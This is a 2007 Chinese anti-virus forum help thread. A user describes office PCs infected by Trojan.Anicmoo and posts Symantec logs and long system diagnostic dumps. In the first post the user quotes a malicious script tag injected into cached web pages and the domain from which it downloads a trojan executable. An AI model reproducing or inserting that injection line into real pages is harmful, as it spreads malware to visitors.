瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 【求助】关于Trojan.Anicmoo和Mytest2.jpg

1   1  /  1  页   跳转

【求助】关于Trojan.Anicmoo和Mytest2.jpg

收藏
0束枭0
头像
初生襁褓狮
  • 帖子:7
  • 注册: 2007-05-19
  • 来自:
发表于: 2007-05-19 18:49 | 只看楼主 短消息 资料
字号: 1楼

【求助】关于Trojan.Anicmoo和Mytest2.jpg


这两天单位里的一些机器陆续都中了这个毒,症状表现为

开一些网站(如新浪、MOP、赛迪)等会报IE缓存中发现病毒,以下是几条记录,SAV10.1.5

====================================================

风险    操作    计数    文件名    风险类型    原始位置    计算机    用户    状态    当前位置    主要操作    次要操作    记录者    操作说明    日期
Trojan.Anicmoo    删除时清理    2    mytest2.jpg    文件    C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\桌面\    5C3AD5EE7D454E4    Administrator    受感染    C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\桌面\    清除安全风险    隔离    自动防护扫描        2007-5-19 17:05:12
Trojan.Anicmoo    部分    2    MyTest2[8].jpg    文件    C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\Local Settings\Temporary Internet Files\Content.IE5\YWX7BL1T\    5C3AD5EE7D454E4    Administrator    受感染    C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\Local Settings\Temporary Internet Files\Content.IE5\YWX7BL1T\    清除安全风险    隔离    自动防护扫描    风险部分删除。    2007-5-19 16:57:10
Trojan.Anicmoo    部分    2    MyTest2[9].jpg    文件    C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\Local Settings\Temporary Internet Files\Content.IE5\YWX7BL1T\    5C3AD5EE7D454E4    Administrator    受感染    C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\Local Settings\Temporary Internet Files\Content.IE5\YWX7BL1T\    清除安全风险    隔离    自动防护扫描    风险部分删除。    2007-5-19 16:57:03
Trojan.Anicmoo    部分    2    MyTest2[7].jpg    文件    C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\Local Settings\Temporary Internet Files\Content.IE5\YWX7BL1T\    5C3AD5EE7D454E4    Administrator    受感染    C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\Local Settings\Temporary Internet Files\Content.IE5\YWX7BL1T\    清除安全风险    隔离    自动防护扫描    风险部分删除。    2007-5-19 16:51:09
Trojan.Anicmoo    部分    2    MyTest2[5].jpg    文件    C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\Local Settings\Temporary Internet Files\Content.IE5\YWX7BL1T\    5C3AD5EE7D454E4    Administrator    受感染    C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\Local Settings\Temporary Internet Files\Content.IE5\YWX7BL1T\    清除安全风险    隔离    自动防护扫描    风险部分删除。    2007-5-19 16:51:03

===================================================


全盘扫描未发现病毒,使用Autoruns禁用掉未验证启动项,重起进入安全模式后打开网站依旧报毒

分析缓存中网页的代码,发现网页代码中给加了这样一行
<script src=http://16a.us/2.js></script>
下载这个脚本后发现运行结果正是要下载刚才的那个病毒mytest2.jpg,另外缓存中来自那个网站的还有Vernum.js和New[1].js,运行无效果(表面上)
分析mytest2.jpg(不才,用记事本打开的),里面有个下载文件htTP://16a.us/oK/svchost.exe的命令,下载得到该文件23K没敢运行,万一又是个熊猫呢……

而且在其他正常的机器上访问相同的网页就没有发现带毒,网页源码中也没有插入那样的代码,在其他机器上将网页拷贝到中毒的机器上开网页的话网页也不会被更改。

更换火狐浏览器、重置了winsock问题依旧

怀疑是哪个系统模块被劫持在HTTP协议的API中做了手脚?把下载得网页都打上代码吗?

试过诺顿和卡巴,均未发现病毒。

目前只有在HOSTS文件里面将16a.us域名改为本机,但修改代码后会造成一些网页显示不正常

还未找到有效的解决方法
希望高手帮忙解决!!!谢谢!!







使用http://www.virustotal.com/en/indexf.html网测试那个病毒程序的结果是

suspicious,带木马性质的蠕虫……又一个熊猫- -汗
最后编辑2007-05-19 19:02:43
分享到:
gototop
 
0束枭0
头像
初生襁褓狮
  • 帖子:7
  • 注册: 2007-05-19
  • 来自:
发表于: 2007-05-19 18:51 | 只看楼主 短消息 资料
字号: 2楼

分析结果



[CODE]

2007-05-19,17:43:54

System Repair Engineer 2.4.12.806
Smallfrogs (http://www.KZTechs.com)

Windows XP Professional Service Pack 2 (Build 2600) - 管理权限用户 - 完整功能

以下内容被选中:
  所有的启动项目(包括注册表、启动文件夹、服务等)
  浏览器加载项
  正在运行的进程(包括进程模块信息)
  文件关联
  Winsock 提供者
  Autorun.inf
  HOSTS 文件


启动项目
注册表
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
  <ctfmon.exe><C:\WINDOWS\system32\ctfmon.exe> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
  <ccApp><"C:\Program Files\Common Files\Symantec Shared\ccApp.exe"> [(Verified)Symantec Corporation]
  <IMSCMig><C:\PROGRA~1\COMMON~1\MICROS~1\IME\IMSC40A\IMSCMIG.EXE /Preload> [(Verified)Microsoft Corporation]
  <vptray><C:\PROGRA~1\SYMANT~2\\vptray.exe> [(Verified)Symantec Corporation]
  <360Safetray><C:\Program Files\360safe\safemon\360Tray.exe /start> [奇虎网]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
  <shell><Explorer.exe> [(Verified)Microsoft Windows Publisher]
  <Userinit><C:\WINDOWS\system32\userinit.exe,> [(Verified)Microsoft Windows Publisher]
  <UIHost><logonui.exe> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
  <{AEB6717E-7E19-11d0-97EE-00C04FD91972}><shell32.dll> [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
  <WebCheck><%SystemRoot%\system32\webcheck.dll> [(Verified)Microsoft Windows Publisher]
  <SysTray><C:\WINDOWS\system32\stobject.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt32chain]
  <WinlogonNotify: crypt32chain><crypt32.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptnet]
  <WinlogonNotify: cryptnet><cryptnet.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cscdll]
  <WinlogonNotify: cscdll><cscdll.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ScCertProp]
  <WinlogonNotify: ScCertProp><wlnotify.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Schedule]
  <WinlogonNotify: Schedule><wlnotify.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\sclgntfy]
  <WinlogonNotify: sclgntfy><sclgntfy.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SensLogn]
  <WinlogonNotify: SensLogn><WlNotify.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\termsrv]
  <WinlogonNotify: termsrv><wlnotify.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\wlballoon]
  <WinlogonNotify: wlballoon><wlnotify.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}]
  <Microsoft Windows Media Player><C:\WINDOWS\inf\unregmp2.exe /ShowWMP> [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}]
  <Windows 桌面更新><regsvr32.exe /s /n /i:U shell32.dll> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}]
  <Internet Explorer 6><%SystemRoot%\system32\ie4uinit.exe> [(Verified)Microsoft Windows Publisher]
gototop
 
0束枭0
头像
初生襁褓狮
  • 帖子:7
  • 注册: 2007-05-19
  • 来自:
发表于: 2007-05-19 18:51 | 只看楼主 短消息 资料
字号: 3楼

==================================
启动文件夹
N/A

==================================
服务
[ACU Configuration Service / ACS][Stopped/Manual Start]
<C:\WINDOWS\system32\acs.exe><N/A>
[Ati HotKey Poller / Ati HotKey Poller][Running/Auto Start]
<C:\WINDOWS\system32\Ati2evxx.exe><ATI Technologies Inc.>
[Symantec Event Manager / ccEvtMgr][Running/Auto Start]
<"C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe"><Symantec Corporation>
[SMS 代理主机 / CcmExec][Running/Auto Start]
<C:\WINDOWS\system32\CCM\CcmExec.exe><Microsoft Corporation>
[Symantec Settings Manager / ccSetMgr][Running/Auto Start]
<"C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe"><Symantec Corporation>
[Symantec AntiVirus Definition Watcher / DefWatch][Running/Auto Start]
<"C:\Program Files\Symantec AntiVirus\DefWatch.exe"><Symantec Corporation>
[Intel(R) PROSet/Wireless Event Log / EvtEng][Stopped/Disabled]
<C:\Program Files\Intel\Wireless\Bin\EvtEng.exe><Intel Corporation>
[Human Interface Device Access / HidServ][Stopped/Disabled]
<C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SystemRoot%\System32\hidserv.dll><N/A>
[ThinkPad PM Service / IBMPMSVC][Running/Auto Start]
<C:\WINDOWS\system32\ibmpmsvc.exe><>
[InstallDriver Table Manager / IDriverT][Stopped/Manual Start]
<"C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe"><Macrovision Corporation>
[LiveUpdate / LiveUpdate][Stopped/Manual Start]
<"C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE"><Symantec Corporation>
[Lotus Notes Single Logon / Lotus Notes Single Logon][Running/Auto Start]
<"C:\Program Files\lotus\notes\nslsvice.exe"><IBM Corp>
[McAfee Framework Service / McAfeeFramework][Running/Auto Start]
<"C:\Program Files\McAfee\Common Framework\FrameworkService.exe" /ServiceStart><McAfee, Inc.>
[Multi-user Cleanup Service / Multi-user Cleanup Service][Running/Auto Start]
<"C:\Program Files\lotus\notes\ntmulti.exe"><IBM Corp>
[Symantec 系统中心搜索服务 / NSCTOP][Running/Auto Start]
<C:\PROGRA~1\Symantec\SYMANT~1\NSCTOP.EXE><Symantec Corporation>
[Intel(R) PROSet/Wireless Registry Service / RegSrvc][Running/Auto Start]
<C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe><Intel Corporation>
[Intel(R) PROSet/Wireless Service / S24EventMonitor][Stopped/Auto Start]
<C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe><Intel Corporation>
[SavRoam / SavRoam][Running/Auto Start]
<"C:\Program Files\Symantec AntiVirus\SavRoam.exe"><symantec>
[Symantec Network Drivers Service / SNDSrvc][Stopped/Manual Start]
<"C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe"><Symantec Corporation>
[SoundMAX Agent Service / SoundMAX Agent Service (default)][Running/Auto Start]
<C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe><Analog Devices, Inc.>
[Symantec SPBBCSvc / SPBBCSvc][Running/Auto Start]
<"C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe"><Symantec Corporation>
[Symantec AntiVirus / Symantec AntiVirus][Running/Auto Start]
<"C:\Program Files\Symantec AntiVirus\Rtvscan.exe"><Symantec Corporation>
[TomDemoService / TomDemoService][Stopped/Disabled]
<C:\CONFIG.EXE><N/A>
[IBM KCU Service / TpKmpSVC][Stopped/Disabled]
<C:\WINDOWS\system32\TpKmpSVC.exe><N/A>
[SMS Remote Control Agent / Wuser32][Running/Auto Start]
<C:\WINDOWS\system32\CCM\CLICOMP\RemCtrl\Wuser32.exe><Microsoft Corporation>

==================================
驱动程序
[aeaudio / aeaudio][Running/Manual Start]
<system32\drivers\aeaudio.sys><Andrea Electronics Corporation>
[AEGIS Protocol (IEEE 802.1x) v3.6.0.0 / AegisP][Stopped/Disabled]
<system32\DRIVERS\AegisP.sys><Meetinghouse Data Communications>
[AntiARP NDIS Protocol Driver / AntiArpNdisProt][Running/Auto Start]
<system32\DRIVERS\AntiArpNdisProt.sys><Windows (R) 2000 DDK provider>
[ati2mtag / ati2mtag][Running/Manual Start]
<system32\DRIVERS\ati2mtag.sys><ATI Technologies Inc.>
[Broadcom NetXtreme Gigabit Ethernet / b57w2k][Running/Manual Start]
<system32\DRIVERS\b57xp32.sys><Broadcom Corporation>
[Symantec Eraser Control driver / eeCtrl][Running/System Start]
<\??\C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys><Symantec Corporation>
[EraserUtilRebootDrv / EraserUtilRebootDrv][Running/Manual Start]
<\??\C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys><Symantec Corporation>
[HSFHWICH / HSFHWICH][Running/Manual Start]
<system32\DRIVERS\HSFHWICH.sys><Conexant Systems, Inc.>
[HSF_DPV / HSF_DPV][Running/Manual Start]
<system32\DRIVERS\HSF_DPV.sys><Conexant Systems, Inc.>
[IBMPMDRV / IBMPMDRV][Running/Manual Start]
<system32\DRIVERS\ibmpmdrv.sys><Lenovo.>
[jbridgep / jbridgep][Stopped/Disabled]
<\??\C:\DOCUME~1\ADMINI~1.5C3\LOCALS~1\Temp\jbridgep.sys><N/A>
[mdmxsdk / mdmxsdk][Running/Auto Start]
<system32\DRIVERS\mdmxsdk.sys><Conexant>
[NAVENG / NAVENG][Running/Manual Start]
<\??\C:\PROGRA~1\COMMON~1\SYMANT~1\VIRUSD~1\20070518.019\naveng.sys><Symantec Corporation>
[NAVEX15 / NAVEX15][Running/Manual Start]
<\??\C:\PROGRA~1\COMMON~1\SYMANT~1\VIRUSD~1\20070518.019\navex15.sys><Symantec Corporation>
[npkcrypt / npkcrypt][Running/Auto Start]
<\??\D:\Program Files\Tencent\QQ\npkcrypt.sys><INCA Internet Co., Ltd.>
[NSC Infrared Device Driver / NSCIRDA][Running/Manual Start]
<system32\DRIVERS\nscirda.sys><National Semiconductor Corporation>
[oreans32 / oreans32][Stopped/Disabled]
<\??\C:\WINDOWS\system32\drivers\oreans32.sys><N/A>
[SMS Process Event Driver / prepdrvr][Running/Manual Start]
<\??\C:\WINDOWS\system32\CCM\prepdrv.sys><Microsoft Corporation>
[Direct Parallel Link Driver / Ptilink][Running/Manual Start]
<system32\DRIVERS\ptilink.sys><Parallel Technologies, Inc.>
[WLAN 传输 / s24trans][Running/Auto Start]
<system32\DRIVERS\s24trans.sys><Intel Corporation>
[SAVRT / SAVRT][Running/Manual Start]
<\??\C:\Program Files\Symantec AntiVirus\savrt.sys><Symantec Corporation>
[SAVRTPEL / SAVRTPEL][Running/System Start]
<\??\C:\Program Files\Symantec AntiVirus\Savrtpel.sys><Symantec Corporation>
[Secdrv / Secdrv][Running/Auto Start]
<system32\DRIVERS\secdrv.sys><Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.>
[smwdm / smwdm][Running/Manual Start]
<system32\drivers\smwdm.sys><Analog Devices, Inc.>
[SPBBCDrv / SPBBCDrv][Running/System Start]
<\??\C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCDrv.sys><Symantec Corporation>
[sptd / sptd][Stopped/Disabled]
<System32\Drivers\sptd.sys><Duplex Secure Ltd.>
[SymEvent / SymEvent][Running/Manual Start]
<\??\C:\Program Files\Symantec\SYMEVENT.SYS><Symantec Corporation>
[SYMREDRV / SYMREDRV][Running/Manual Start]
<\SystemRoot\System32\Drivers\SYMREDRV.SYS><Symantec Corporation>
[SYMTDI / SYMTDI][Running/System Start]
<\SystemRoot\System32\Drivers\SYMTDI.SYS><Symantec Corporation>
[Synaptics TouchPad Driver / SynTP][Running/Manual Start]
<system32\DRIVERS\SynTP.sys><Synaptics, Inc.>
[TCP/IP Protocol Driver / Tcpip][Running/System Start]
<system32\DRIVERS\tcpip.sys><Microsoft Corporation>
[TPPWRIF / TPPWRIF][Stopped/Disabled]
<System32\drivers\Tppwrif.sys><N/A>
[Conexant Setup API / UIUSys][Stopped/Disabled]
<system32\drivers\UIUSys.sys><N/A>
[VCD VNC Virtual Network Adapter / vcddev][Stopped/Manual Start]
<system32\DRIVERS\vcdvnic.sys><VNN B.J.>
[用于 Windows XP 的英特尔(R) PRO/无线 2200BG 网络连接驱动程序 / w29n51][Stopped/Manual Start]
<system32\DRIVERS\w29n51.sys><Intel? Corporation>
[winachsf / winachsf][Running/Manual Start]
<system32\DRIVERS\HSF_CNXT.sys><Conexant Systems, Inc.>
[xAntiArpSpoof Service / xAntiArp][Running/Manual Start]
<system32\DRIVERS\xAntiArp.sys><Windows (R) 2000 DDK provider>
gototop
 
0束枭0
头像
初生襁褓狮
  • 帖子:7
  • 注册: 2007-05-19
  • 来自:
发表于: 2007-05-19 18:52 | 只看楼主 短消息 资料
字号: 4楼


==================================
浏览器加载项
[AcroIEHlprObj Class]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} <C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll, Adobe Systems Incorporated>
[Java Plug-in 1.5.0_11]
{08B0E5C0-4FCB-11CF-AAA5-00401C608501} <C:\Program Files\Java\jre1.5.0_11\bin\ssv.dll, N/A>
[AcroIEHlprObj Class]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} <C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll, Adobe Systems Incorporated>
[Web Browser Applet Control]
{08B0E5C0-4FCB-11CF-AAA5-00401C608501} <C:\WINDOWS\system32\msjava.dll, Microsoft Corporation>
[CKAVWebScan Object]
{0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} <C:\WINDOWS\system32\Kaspersky Lab\Kaspersky Online Scanner Pro\kavwebscan.dll, Kaspersky Lab>
[PeerDraw Class]
{10072CEC-8CC1-11D1-986E-00A0C955B42E} <C:\Program Files\Common Files\Microsoft Shared\VGX\vgx.dll, Microsoft Corporation>
[Windows Genuine Advantage]
{17492023-C23A-453E-A040-C7C580BBF700} <C:\WINDOWS\system32\LegitCheckControl.dll, Microsoft? Corporation>
[iTrusPTA Class]
{1E0DFFCF-27FF-4574-849B-55007349FEDA} <C:\WINDOWS\system32\aliedit\pta.dll, >
[Windows Media Player]
{22D6F312-B0F6-11D0-94AB-0080C74C7E95} <C:\WINDOWS\system32\wmpdxm.dll, Microsoft Corporation>
[HTML Document]
{25336920-03F9-11CF-8FD0-00AA00686F13} <%SystemRoot%\system32\mshtml.dll, N/A>
[DHTML Edit Control Safe for Scripting]
{2D360201-FFF5-11D1-8D03-00A0C959BC0A} <C:\WINDOWS\system32\Dhtmled.ocx, Microsoft Corporation>
[IETag Factory]
{38481807-CA0E-42D2-BF39-B33AF135CC4D} <C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\IETAG.DLL, Microsoft Corporation>
[EditCtrl Class]
{488A4255-3236-44B3-8F27-FA1AECAA8844} <C:\WINDOWS\system32\aliedit\aliedit.dll, >
[HHCtrl Object]
{52A2AAAE-085D-4187-97EA-8C30DB990436} <C:\WINDOWS\system32\hhctrl.ocx, Microsoft Corporation>
[Shell Name Space]
{55136805-B2DE-11D1-B9F2-00A0C98BC547} <%SystemRoot%\system32\shdocvw.dll, N/A>
[CKAVReportCtrl Object]
{6117669B-8C2D-41FA-A6D9-9E484B999CF0} <C:\WINDOWS\system32\Kaspersky Lab\Kaspersky Online Scanner Pro\kavwebscan.dll, Kaspersky Lab>
[WUWebControl Class]
{6414512B-B978-451D-A0D8-FCFDF33E833C} <C:\WINDOWS\system32\wuweb.dll, Microsoft Corporation>
[Windows Media Player]
{6BF52A52-394A-11D3-B153-00C04F79FAA6} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[WangWangObj Class]
{6E213FC7-DD5A-4115-B7E6-D4C7838C361E} <C:\Program Files\淘宝网\淘宝旺旺\WangWangX4.dll, 阿里软件(中国)有限公司>
[MUWebControl Class]
{6E32070A-766D-4EE6-879C-DC1FA91D2FC3} <C:\WINDOWS\system32\muweb.dll, Microsoft Corporation>
[Microsoft Web 浏览器]
{8856F961-340A-11D0-A96B-00C04FD705A2} <C:\WINDOWS\system32\shdocvw.dll, Microsoft Corporation>
[Java Plug-in 1.5.0_11]
{8AD9C840-044E-11D1-B3E9-00805F499D93} <C:\Program Files\Java\jre1.5.0_11\bin\ssv.dll, N/A>
[WLCtnCtrl Class]
{A8BE6022-A0E7-49D9-9E51-7CBFAC800CFB} <C:\Program Files\MSN Cartoon (Beta)\CartoonCtrl.dll, Microsoft Corp.>
[Microsoft Scriptlet Component]
{AE24FDAE-03C6-11D1-8B76-0080C744F389} <C:\WINDOWS\system32\mshtml.dll, Microsoft Corporation>
[SearchAssistantOC]
{B45FF030-4447-11D2-85DE-00C04FA35C89} <%SystemRoot%\system32\shdocvw.dll, N/A>
[RDS.DataSpace]
{BD96C556-65A3-11D0-983A-00C04FC29E36} <C:\Program Files\Common Files\System\MSADC\msadco.dll, Microsoft Corporation>
[AUDIO__MID Moniker Class]
{CD3AFA74-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[AUDIO__MP3 Moniker Class]
{CD3AFA76-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[AUDIO__WAV Moniker Class]
{CD3AFA7B-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[AUDIO__X_MS_WMA Moniker Class]
{CD3AFA84-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[VIDEO__X_MS_ASF Moniker Class]
{CD3AFA8F-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[VIDEO__X_MS_WMV Moniker Class]
{CD3AFA94-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[RealPlayer G2 Control]
{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA} <C:\WINDOWS\system32\rmoc3260.dll, RealNetworks, Inc.>
[Shockwave Flash Object]
{D27CDB6E-AE6D-11CF-96B8-444553540000} <C:\WINDOWS\system32\Macromed\Flash\Flash9b.ocx, Adobe Systems, Inc.>
[WebBasedClientInstall Class]
{D30CA0FD-1CA0-11D4-AC78-006008A9A8BC} <C:\WINDOWS\Downloaded Program Files\WebInst.Dll, Symantec Corporation>
[Domino Web Access 7 Control]
{E008A543-CEFB-4559-912F-C27C2B89F13B} <C:\WINDOWS\Downloaded Program Files\dwa7W.dll, IBM Corporation>
[上传到QQ网络硬盘]
<D:\Program Files\Tencent\QQ\AddToNetDisk.htm, N/A>
[使用迅雷下载]
<C:\Program Files\Thunder Network\Thunder\Program\GetUrl.htm, N/A>
[使用迅雷下载全部链接]
<C:\Program Files\Thunder Network\Thunder\Program\GetAllUrl.htm, N/A>
[导出到 Microsoft Office Excel(&X)]
<res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000, N/A>
[添加到QQ自定义面板]
<D:\Program Files\Tencent\QQ\AddPanel.htm, N/A>
[添加到QQ表情]
<D:\Program Files\Tencent\QQ\AddEmotion.htm, N/A>
[用QQ彩信发送该图片]
<D:\Program Files\Tencent\QQ\SendMMS.htm, N/A>
[转换为 Adobe PDF]
<res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html, N/A>
[转换为现有 PDF]
<res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html, N/A>
[转换选定的链接为 Adobe PDF]
<res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html, N/A>
[转换选定的链接为现有 PDF]
<res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html, N/A>
[转换选项为 Adobe PDF]
<res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html, N/A>
[转换选项为现有 PDF]
<res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html, N/A>
[转换链接目标为 Adobe PDF]
<res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html, N/A>
[转换链接目标为现有 PDF]
<res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html, N/A>
gototop
 
0束枭0
头像
初生襁褓狮
  • 帖子:7
  • 注册: 2007-05-19
  • 来自:
发表于: 2007-05-19 18:52 | 只看楼主 短消息 资料
字号: 5楼




==================================
正在运行的进程
[PID: 444][\SystemRoot\System32\smss.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 492][\??\C:\WINDOWS\system32\csrss.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1688][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\WINDOWS\system32\UxTheme.dll] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\Program Files\Adobe\Acrobat 7.0\ActiveX\PDFShell.dll] [Adobe Systems, Inc., 7.0.0.0]
  [C:\Program Files\Adobe\Acrobat 7.0\ActiveX\PDFShell.CHS] [Adobe Systems, Inc., 7.0.0.0]
  [C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll] [Adobe Systems Incorporated, 7.0.0.2004121400]
  [C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
  [C:\Program Files\WinRAR\rarext.dll] [N/A, ]
  [C:\Program Files\Common Files\Symantec Shared\SSC\vpshell2.dll] [Symantec Corporation, 10.1.5.5000]
  [D:\Program Files\Tencent\QQ\qdshm.dll] [, 1, 0, 101, 20]
  [D:\Program Files\Tencent\QQ\MFC42.DLL] [Microsoft Corporation, 6.00.8665.0]
  [C:\Program Files\Adobe\Acrobat 7.0\Acrobat Elements\ContextMenu.dll] [Adobe Systems Inc., 7.0.0.2004121400\0]
  [C:\WINDOWS\system32\MFC71.DLL] [Microsoft Corporation, 7.10.3077.0]
  [C:\WINDOWS\system32\MSVCP71.dll] [Microsoft Corporation, 7.10.3077.0]
  [C:\WINDOWS\system32\MFC71CHS.DLL] [Microsoft Corporation, 7.10.3077.0]
  [C:\Program Files\Adobe\Acrobat 7.0\Acrobat Elements\ContextMenu.chs] [Adobe Systems Inc., 7.0.0.2004121400\0]
[PID: 344][C:\Program Files\Common Files\Symantec Shared\ccApp.exe] [Symantec Corporation, 104.0.11.1]
  [C:\WINDOWS\system32\MSVCP71.dll] [Microsoft Corporation, 7.10.3077.0]
  [C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
  [C:\Program Files\Common Files\Symantec Shared\ccL40.dll] [Symantec Corporation, 104.0.11.1]
  [C:\Program Files\Common Files\Symantec Shared\ccVrTrst.dll] [Symantec Corporation, 104.0.11.1]
  [C:\Program Files\Common Files\Symantec Shared\ccSet.dll] [Symantec Corporation, 104.0.11.1]
  [C:\PROGRA~1\COMMON~1\SYMANT~1\CCALERT.DLL] [Symantec Corporation, 104.0.11.1]
  [C:\PROGRA~1\COMMON~1\SYMANT~1\CCEMLPXY.DLL] [Symantec Corporation, 104.0.11.1]
  [C:\WINDOWS\system32\SYMREDIR.DLL] [Symantec Corporation, 6.0.4.402]
  [C:\Program Files\Common Files\Symantec Shared\ccSetEvt.dll] [Symantec Corporation, 104.0.11.1]
  [C:\Program Files\Common Files\Symantec Shared\ccProSub.dll] [Symantec Corporation, 104.0.11.1]
  [C:\Program Files\Symantec AntiVirus\SavEmail.dll] [Symantec Corporation, 10.1.5.5000]
[PID: 1132][C:\PROGRA~1\SYMANT~2\vptray.exe] [Symantec Corporation, 10.1.5.5000]
  [C:\WINDOWS\system32\MSVCP71.dll] [Microsoft Corporation, 7.10.3077.0]
  [C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
  [C:\Program Files\Common Files\Symantec Shared\ccL40.dll] [Symantec Corporation, 104.0.11.1]
  [C:\Program Files\Symantec AntiVirus\SAVRT32.DLL] [Symantec Corporation, 9.7.2.3]
  [C:\Program Files\Common Files\Symantec Shared\ccSetEvt.dll] [Symantec Corporation, 104.0.11.1]
  [C:\Program Files\Common Files\Symantec Shared\ccVrTrst.dll] [Symantec Corporation, 104.0.11.1]
